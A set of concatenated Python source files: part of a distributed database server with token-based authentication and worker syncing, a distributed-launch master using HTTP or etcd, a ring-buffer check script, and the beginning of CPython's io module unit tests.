self.connection.send(authentication)
else:
raise PermissionError()
elif data == self.master_key: # master key
self.current_session = {'is_admin': True}
else: # JSON Web Token
try:
self.current_session = jwt.decode(data, self.master_key)
except Exception:
error_msg = 'Invalid token!'
raise PermissionError()
return True
except PermissionError:
self.connection.send(error_msg, 'exception')
return False
except Exception:
self.handle_error(request, client_address)
return False
def authorize(self, query):
self.current_session['request_type'] = query['request_type']
self.current_session['is_error'] = False
if not self.current_session['is_admin']:
if (query['request_type'] in ('shutdown', 'add_worker', 'remove_worker',
'release_worker', 'acquire_worker',
'sync_databases', 'recv_databases',
'add_session', 'remove_session', 'list_sessions') or
query['request_type'] == 'create_database' and not self.current_session['create_allowed'] or
query['request_type'] in ('new_batch', 'restore_database', 'remove_database',
'add_attachment', 'remove_attachment') and
(not self.current_session['databases'] or query('path') not in self.current_session['databases'])):
raise PermissionError('Not enough privileges!')
if query['request_type'] in ('recv_databases', 'new_batch', 'restore_database',
'create_database', 'remove_database',
'add_attachment', 'remove_attachment'):
self.current_session['database_modified'] = True
else:
self.current_session['database_modified'] = False
def send(self, server_address, msg, recv=False):
try:
connection = Connection(server_address)
connection.send(self.master_key)
connection.recv()
connection.send(msg)
if recv:
return connection.recv()
finally:
connection.kill()
def request(self, server_address, msg):
return self.send(server_address, msg, recv=True)
class CentralServer(DatabaseServer):
def __init__(self, root_path, certfile, debug=False):
super().__init__((get_ip(), SERVER_PORT), CentralQueryHandler, root_path, certfile, debug)
self.certfile = certfile
self.log = logging.getLogger('central_server')
self.refresh_databases()
self.sessions = None
self.nodes = dict()
def start(self, sessions_file=None):
if sessions_file:
password = getpass.getpass('password: ')
self.sessions = Sessions(sessions_file)
else:
sessions_file = os.path.join(self.root_path, 'sessions.json')
if os.path.exists(sessions_file):
password = getpass.getpass('password: ')
self.sessions = Sessions(sessions_file)
else:
while True:
password = getpass.getpass('password: ')
password_confirm = getpass.getpass('confirm password: ')
if password == password_confirm:
break
else:
print('Password does not match the confirm password. Please enter it again:')
self.sessions = Sessions(sessions_file, password)
manager = Manager()
databases = manager.dict(self.databases)
locked_databases = manager.dict()
start_workers(self.server_address, self.root_path, self.certfile, manager, 'admin', password, databases, locked_databases,
n_workers=cpu_count() - 1, debug=self._debug)
print('Address: {}:{}'.format(*self.server_address))
log.disable_console()
self.master_key = secrets.token_bytes()
self.serve_forever()
self.log.info('Cluster shutdown')
def shutdown(self):
for node in list(self.nodes):
self.shutdown_node(node)
self.wait()
super().shutdown()
def shutdown_node(self, node):
for worker in list(self.nodes[node].workers):
self.send(worker, {'request_type': 'shutdown'})
def info(self):
info = list()
info.append(f"user: {self.current_session['user']}")
if self.current_session['is_admin']:
info.append(f"administrator privileges")
elif self.current_session['create_allowed']:
info.append(f"regular privileges; database creation allowed")
else:
info.append(f"regular privileges")
info.append(f"address: {self.server_address}")
info.append(f"\n{len(self.nodes)} nodes ({sum(len(node.workers) for node in self.nodes.values())} workers):")
for node_address, node in self.nodes.items():
info.append(f" '{node_address}': {len(node.workers)} workers ({node.get_queue()} job/s in progress)")
if node.backup:
info[-1] += ' (backup mode)'
if self.databases:
info.append(f"\n{len(self.databases)} databases:")
for database in self.databases:
if not self.current_session['is_admin'] and (not self.current_session['databases'] or
database not in self.current_session['databases']):
info.append(f" '{database}' [read-only]")
else:
info.append(f" '{database}'")
return '\n'.join(info)
def add_worker(self, worker, databases, backup):
if worker[0] not in self.nodes:
self.nodes[worker[0]] = Node([worker], databases, backup)
else:
self.nodes[worker[0]].workers[worker] = 0
def remove_worker(self, worker):
del self.nodes[worker[0]].workers[worker]
if not self.nodes[worker[0]].workers:
del self.nodes[worker[0]]
if len(self.nodes) == 0:
self._done.set()
def acquire_worker(self, node=None, database=None):
if not node:
for node in sorted(self.nodes, key=lambda x: self.nodes[x].get_queue()):
if (database in self.nodes[node].databases and
(not database in self.databases or
self.nodes[node].databases[database] == self.databases[database])):
break
worker = self.nodes[node].get_worker()
self.nodes[worker[0]].workers[worker] += 1
return worker
def release_worker(self, worker):
self.nodes[worker[0]].workers[worker] -= 1
def sync_databases(self, nodes, databases, connection):
if not nodes:
nodes = list(self.nodes)
try:
nodes.remove(self.server_address[0])
except ValueError:
pass
nodes = {node: self.nodes[node].backup for node in nodes}
if not nodes:
raise ValueError('At least 2 nodes are required in order to sync them!')
connection.send({'request_type': 'sync_databases',
'nodes': nodes, 'databases': databases,
'redirection_address': self.acquire_worker(node=self.server_address[0])})
def shutdown_request(self, request):
super().shutdown_request(request)
self.current_session = None
self.connection = None
class Node(object):
def __init__(self, workers, databases, backup):
self.workers = {worker: 0 for worker in workers}
self.databases = databases
self.backup = backup
def get_worker(self):
return sorted(self.workers, key= lambda x: self.workers[x])[0]
def get_queue(self):
return sum(queue for queue in self.workers.values())
class WorkerServer(DatabaseServer):
def __init__(self, server_address, central_address, root_path, certfile,
databases, main_lock, database_lock, backup=False, debug=False):
super().__init__(server_address, WorkerQueryHandler, root_path, certfile, debug)
self.log = logging.getLogger()
self.central = central_address
self.databases = databases
self.current_database = None
self.main_lock = main_lock
self.database_lock = database_lock
self.backup = backup
self._shutdown_request = False
def start(self, user, password):
try:
connection = Connection(self.central)
from loadit.__init__ import __version__
connection.send({'user': user,
'password': password,
'request': 'master_key',
'version': __version__})
self.master_key = connection.recv()
connection.send({'request_type': 'add_worker',
'worker_address': self.server_address,
'databases': self.databases._getvalue(),
'backup': self.backup})
finally:
connection.kill()
log.disable_console()
self.serve_forever()
def shutdown(self):
self.send(self.central, {'request_type': 'remove_worker',
'worker_address': self.server_address})
super().shutdown()
def shutdown_request(self, request):
self.log.handlers.remove(self.log_handler)
client_address = request.getpeername()[0]
super().shutdown_request(request)
if not self._shutdown_request:
data = {'request_type': 'release_worker',
'worker_address': self.server_address,
'nbytes_in': self.connection.nbytes_in,
'nbytes_out': self.connection.nbytes_out,
'request': self.current_session['request_type'],
'client_address': client_address,
'user': self.current_session['user'],
'database': self.current_database,
'is_error': self.current_session['is_error']}
if self.current_session['database_modified']:
data['databases'] = self.databases._getvalue()
self.send(self.central, data)
self.current_database = None
self.current_session = None
self.connection = None
def sync_databases(self, nodes, databases, client_connection):
self.refresh_databases()
if databases:
update_only = False
databases = {database: self.databases[database] for database in databases if
database in self.databases}
else:
update_only = True
databases = self.databases
for node, backup in nodes.items():
worker = tuple(self.request(self.central, {'request_type': 'acquire_worker', 'node': node})[1]['worker_address'])
client_connection.send({'msg': f"Syncing node '{node}'..."})
try:
connection = Connection(worker)
connection.send(self.master_key)
connection.recv()
connection.send({'request_type': 'recv_databases'})
remote_databases = connection.recv()
for database in databases:
if (not update_only and (database not in remote_databases or
databases[database] != remote_databases[database]) or
update_only and (not backup and database in remote_databases and databases[database] != remote_databases[database] or
backup and (database not in remote_databases or databases[database] != remote_databases[database]))):
with self.database_lock.acquire(database, block=False):
database_path = Path(self.root_path) / database
files = [file for pattern in ('**/*header.*', '**/*.bin') for file in database_path.glob(pattern)]
connection.send({'database': database, 'msg': '',
'files': [str(file.relative_to(database_path)) for file in files]})
client_connection.send({'msg': f" Syncing database '{database}' ({len(files)} files; {humansize(sum(os.path.getsize(file) for file in files))})..."})
for file in files:
connection.send_file(file)
msg = connection.recv()
connection.send({'msg': "Done!"})
finally:
connection.kill()
client_connection.send({'msg': f"Done!"})
def recv_databases(self, connection):
self.refresh_databases()
connection.send(self.databases._getvalue())
data = connection.recv()
while data['msg'] != 'Done!':
with self.database_lock.acquire(data['database']):
path = Path(self.root_path) / data['database']
path_temp = path.parent / (path.name + '_TEMP')
path_temp.mkdir()
try:
for file in data['files']:
file = path_temp / file
file.parent.mkdir(exist_ok=True)
connection.recv_file(file)
connection.send(b'OK')
if os.path.exists(path):
shutil.rmtree(path)
path_temp.rename(path)
except Exception as e:
shutil.rmtree(path_temp)
raise e
data = connection.recv()
def refresh_databases(self):
with self.main_lock:
self.databases.clear()
self.databases.update(get_local_databases(self.root_path))
return self.databases._getvalue()
def start_worker(server_address, central_address, root_path, certfile,
databases, main_lock, locks, locked_databases, user, password, backup, debug):
import loadit.queries # Pre-load this heavy module
database_lock = ResourceLock(main_lock, locks, locked_databases)
worker = WorkerServer(server_address, central_address, root_path, certfile,
databases, main_lock, database_lock, backup, debug)
worker.start(user, password)
def start_workers(central_address, root_path, certfile, manager, user, password, databases, locked_databases,
n_workers=None, backup=False, debug=False):
if not n_workers:
n_workers = cpu_count()
main_lock = Lock()
locks = [Lock() for lock in range(n_workers)]
host = get_ip()
workers = list()
for i in range(n_workers):
workers.append(Process(target=start_worker, args=((host, find_free_port()), central_address, root_path, certfile,
databases, main_lock, locks, locked_databases,
user, password, backup, debug)))
workers[-1].start()
return workers
def start_node(central_address, root_path, certfile, backup=False, debug=False):
user = input('user: ')
password = getpass.getpass('password: ')
manager = Manager()
databases = manager.dict(get_local_databases(root_path))
locked_databases = manager.dict()
workers = start_workers(central_address, root_path, certfile, manager, user, password, databases, locked_databases,
backup=backup, debug=debug)
for worker in workers:
worker.join()
print('Node shutdown')
def get_local_databases(root_path):
databases = dict()
for header_file in Path(root_path).glob('**/##header.json'):
database = str(header_file.parent.relative_to(root_path).as_posix())
databases[database] = get_database_hash(header_file)
return databases
def get_database_hash(header_file):
with open(header_file, 'rb') as f:
return hash_bytestr(f, get_hasher('sha256'))
def get_batch_message(batch):
sink = pa.BufferOutputStream()
writer = pa.RecordBatchStreamWriter(sink, batch.schema)
writer.write_batch(batch)
writer.close()
return sink.get_result()
|
master.py
|
# Copyright 2022 kuizhiqing
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..utils.kv_client import KVClient
from ..utils.kv_server import KVServer
import time
import sys
import six
import threading
import copy
import random
ETCD_PROTOCAL = 'etcd://'
MODULE_NAME = 'launch'
class Master(object):
'''
Master is a distributed store design to exchange info among nodes
'''
MAIN = "main"
STANDBY = "standby"
PATICIPANT = "participant"
def __init__(self, ctx):
self.ctx = ctx
self.server = None
self.initialized = False
self.endpoint = None
def stop(self):
raise NotImplementedError
def set_status(self, status):
pass
def get_status(self):
return None
def restart_peer(self):
pass
def sync_peers(self, prefix, key, value, size, rank=-1) -> (list, int):
raise NotImplementedError
@classmethod
def factory(cls, ctx):
if ctx.args.master and ctx.args.master.startswith(ETCD_PROTOCAL):
return ETCDMaster(ctx)
else:
return HTTPMaster(ctx)
class HTTPMaster(Master):
def lazy_init(self):
if self.initialized:
return
self.role = Master.PATICIPANT
if self.ctx.args.master:
self.endpoint = self.ctx.args.master
ip, port = self.endpoint.split(':')
if ip in ['127.0.0.1', self.ctx.node.ip]:
time.sleep(2 * random.random())
while not self.ctx.node.is_server_ready(ip, int(port)):
try:
self.server = KVServer(int(port))
self.role = Master.MAIN
break
except Exception as e:
self.ctx.logger.warning("start master failed {}".format(
e))
time.sleep(0.1)
continue
else:
port = self.ctx.node.get_free_port()
self.endpoint = "{}:{}".format(self.ctx.node.ip, port)
self.server = KVServer(port)
self.role = Master.MAIN
print("Copy the following command to other nodes to run.")
cmd = [
sys.executable.split('/')[-1], "-m", MODULE_NAME
]
cmd.extend(["--master", self.endpoint])
cmd.extend(sys.argv[1:])
print("-" * 80)
print(" ".join(cmd))
print("-" * 80)
if self.ctx.args.rank >= 0:
self.ctx.logger.warning(
"--rank set in the command may not compatible in auto mode")
if '127.0.0.1' in self.endpoint:
self.endpoint = self.endpoint.replace('127.0.0.1', self.ctx.node.ip)
self.client = KVClient(self.endpoint)
self.initialized = True
self._start_server()
def _start_server(self):
if self.server and not self.server.started:
self.server.start()
self.ctx.logger.debug("KV server start at {}".format(self.endpoint))
def _stop_server(self):
if self.server and not self.server.stopped:
self.server.stop()
self.ctx.logger.debug("KV server stopped")
def stop(self):
self._stop_server()
def sync_peers(self, prefix, key, value, size, rank=-1) -> (list, int):
if size < 2:
return [value], 0
self.ctx.logger.info("Waiting peer start...")
self.lazy_init()
while not self.ctx.status.is_done():
if self.client.wait_server_ready(timeout=5):
break
else:
self.ctx.logger.warning("master not ready")
time.sleep(0.1)
# 'aaaaaa' make sure main pod (master server) as rank 0
ky = 'aaaaaa' if rank < 0 and self.role == Master.MAIN else key
k = "{}/{}/{}".format(prefix, ky, rank)
while not self.ctx.status.is_done():
if not self.client.put(k, value):
self.ctx.logger.warning("put value failed")
time.sleep(0.1)
continue
rjson = self.client.get_prefix(prefix)
self.ctx.logger.debug("sync peers {}".format(rjson))
if rjson and len(rjson) == size:
if rank < 0:
keys = list(rjson.keys())
keys.sort()
ret = [rjson[k] for k in keys]
idx = ret.index(value)
return ret, idx
else:
ret = [None] * size
for k, v in rjson.items():
ret[int(k.split('/')[-1])] = v
return ret, rank
else:
time.sleep(0.5)
return [], 0
class ETCDMaster(Master):
def __init__(self, ctx):
super().__init__(ctx)
if self.ctx.args.master:
# etcd://localhost:2379
self.endpoint = self.ctx.args.master.strip("etcd://")
import etcd3
host, port = self.endpoint.split(':')
self.client = etcd3.client(host=host, port=port)
def sync_peers(self, prefix, key, value, size, rank=-1) -> (list, int):
'''
sync_peers gather all value for key under scope prefix
result always be sorted either by rank or alphabet of pod.name
'''
if size < 2:
return [value], 0
self.ctx.logger.info("Waiting peer start...")
path = "{}/{}/{}".format(prefix, key, rank)
self.client.delete_prefix(prefix)
self.ctx.logger.debug("sync path {} value {}".format(path, value))
while not self.ctx.status.is_done():
self.client.put(path, six.b(value))
result = [i for i in self.client.get_prefix(prefix)]
result = copy.deepcopy(result)
self.ctx.logger.debug("sync peers {}".format(result))
if len(result) == size:
if rank < 0:
keys = [six.ensure_str(i[1].key) for i in result]
sorted_keys = [six.ensure_str(i[1].key) for i in result]
sorted_keys.sort()
values = [six.ensure_str(i[0]) for i in result]
ret = [values[keys.index(k)] for k in sorted_keys]
idx = ret.index(value)
return ret, idx
else:
ret = [None] * size
for v, k in result:
ii = int(six.ensure_str(k.key).split('/')[-1])
if ii < 0:
self.ctx.logger.error(
"rank {} error in sync".format(ii))
ret[ii] = six.ensure_str(v)
return ret, rank
else:
time.sleep(0.5)
def register_heartbeat(self, job_id, pod_id, ttl=10):
if hasattr(self, 'heartbeat_prefix'):
self.ctx.logger.warning("Heartbeat already done")
return
self.job_prefix = '/launch/{}'.format(job_id)
self.heartbeat_prefix = '{}/heartbeat'.format(self.job_prefix)
lease = self.client.lease(ttl)
#self.client.delete_prefix(self.job_prefix)
beat_path = "{}/{}".format(self.heartbeat_prefix, pod_id)
self.client.put(beat_path, six.b(pod_id), lease=lease)
def _beat_watch(event):
self.ctx.status.restart()
beat_watch = self.client.add_watch_prefix_callback(
self.heartbeat_prefix, _beat_watch)
def _heartbeat():
while not self.ctx.status.is_done():
try:
lease.refresh()
if pod_id not in self.fetch_peer_alive():
self.client.put(beat_path, six.b(pod_id), lease=lease)
self.ctx.logger.debug("Heartbeat register again")
except Exception as e:
self.ctx.logger.error("Heartbeat error {}".format(e))
time.sleep(ttl / 2)
self.ctx.logger.debug("Heartbeat done")
self.client.cancel_watch(beat_watch)
self.beat_thread = threading.Thread(
name='heartbeat', target=_heartbeat, daemon=True)
self.beat_thread.start()
def fetch_peer_alive(self):
peer_alive = [
six.ensure_str(i[0])
for i in self.client.get_prefix(self.heartbeat_prefix)
]
self.ctx.logger.debug("peer alive {}".format(peer_alive))
return peer_alive
def wait_peer_ready(self, replicas_min, replicas_max, timeout):
end = time.time() + timeout
while not self.ctx.status.is_done() and time.time() < end:
if len(self.fetch_peer_alive()) == replicas_max:
return (True, replicas_max)
else:
time.sleep(0.5)
np = len(self.fetch_peer_alive())
if np >= replicas_min and np <= replicas_max:
return (True, np)
else:
return (False, np)
def restart_peer(self):
self.client.delete_prefix(self.heartbeat_prefix)
def set_status(self, status):
assert self.client.put(
self.job_prefix, six.b(status),
lease=self.client.lease(600)), "set status failed {}".format(status)
def get_status(self):
return six.ensure_str(self.client.get(self.job_prefix)[0] or '')
def stop(self):
if hasattr(self, 'beat_thread'):
self.ctx.status.done()
# TODO(kuizhiqing) thread should exit
#self.beat_thread.join()
|
verify_buffer.py
|
"""
"""
import threading
from data_pipe.any_buffer import AnyBufferCore
def verify_buffer_sync(buffer:AnyBufferCore):
print()
print(f"buffer: {buffer}")
count = buffer.ring_size * 10
source = []
target = []
def buffer_writer_sync():
for index in range(count):
source.append(index)
buffer.invoke_writer_sync(index)
def buffer_reader_sync():
for index in range(count):
index = buffer.invoke_reader_sync()
target.append(index)
thread_writer = threading.Thread(target=buffer_writer_sync, daemon=True)
thread_reader = threading.Thread(target=buffer_reader_sync, daemon=True)
thread_writer.start()
thread_reader.start()
thread_writer.join()
thread_reader.join()
assert source == target
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
